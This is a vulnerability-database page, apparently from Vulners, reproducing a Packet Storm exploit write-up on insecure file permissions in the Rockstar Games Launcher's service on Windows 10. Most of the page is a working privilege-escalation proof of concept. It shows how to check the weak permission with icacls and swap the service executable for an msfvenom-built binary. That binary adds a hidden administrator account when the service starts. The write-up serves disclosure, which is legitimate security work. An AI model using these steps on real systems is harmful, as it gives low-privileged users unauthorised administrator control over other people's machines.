Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Rockstar Service Insecure File Permissions

🗓️ 03 Apr 2021 00:00:00Reported by George TsimpidasType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 240 Views

Rockstar Service Insecure File Permissions Vulnerabilit

Code
`# Exploit Title: Rockstar Service - Insecure File Permissions  
# Date: 2020-04-02  
# Exploit Author: George Tsimpidas  
# Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher  
# Version Patch: 1.0.37.349  
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362  
  
Vulnerability Description:  
  
RockstarService.exe suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the existing executable file of the service with a binary of his choice. The vulnerability exist due to weak set of permissions being granted to the "Authenticated Users Group" which grants the (M) Flag aka "Modify Privilege"  
  
#PoC  
  
D:\Launcher> icacls .\Launcher.exe  
  
.\Launcher.exe BUILTIN\Administrators:(I)(F)  
NT AUTHORITY\SYSTEM:(I)(F)  
NT AUTHORITY\Authenticated Users:(I)(M)  
BUILTIN\Users:(I)(RX)  
  
#1. Create low privileged user & Login to that user  
  
C:\>net user lowpriv Password123! /add  
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"  
User name lowpriv  
Local Group Memberships *Users  
Global Group memberships *None  
  
#2. Move the RockstarService.exe to a new name  
  
D:\Launcher> move RockstarService.exe RockstarService.exe.bk  
1 file(s) moved.  
  
#3. Create malicious binary on kali linux with MSF  
  
msfvenom -f exe -p windows/exec CMD="net user placebo Password123! /add && net localgroup Administrators placebo /add" -o RockstarService.exe  
  
#4. Transfer created 'RockstarService.exe' to the Windows Host  
  
#5. Move the created 'RockstarService.exe' binary to the 'D:\Launcher' to replace the old one  
  
#6. Now start the Service  
  
Command : net start 'Rockstar Service'  
  
Now check out that the user has been registered to the system and added to the local group of Administrators  
  
C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr  
/v "Full"  
  
User name placebo  
Local Group Memberships *Administrators *Users  
Global Group memberships *None  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Apr 2021 00:00Current
0.1Low risk
Vulners AI Score0.1
rockstar serviceinsecure file permissionselevation of privilegesauthenticated usersweak permissionswindows 10vulnerabilitymsfkali linuxexploit
240